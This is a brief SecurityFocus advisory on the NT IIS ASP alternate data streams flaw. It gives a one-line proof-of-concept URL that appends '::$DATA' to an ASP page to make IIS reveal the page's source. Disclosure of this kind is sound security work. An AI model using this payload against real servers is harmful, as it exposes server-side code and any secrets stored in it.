NT IIS ASP Alternate Data Streams Vulnerability

The following proof of concept was provided:

http://xyz/myasp.asp::$DATA

This will cause IIS to disclose the contents of the page, myasp.asp, to an attacker.


 

Privacy Statement
Copyright 2010, SecurityFocus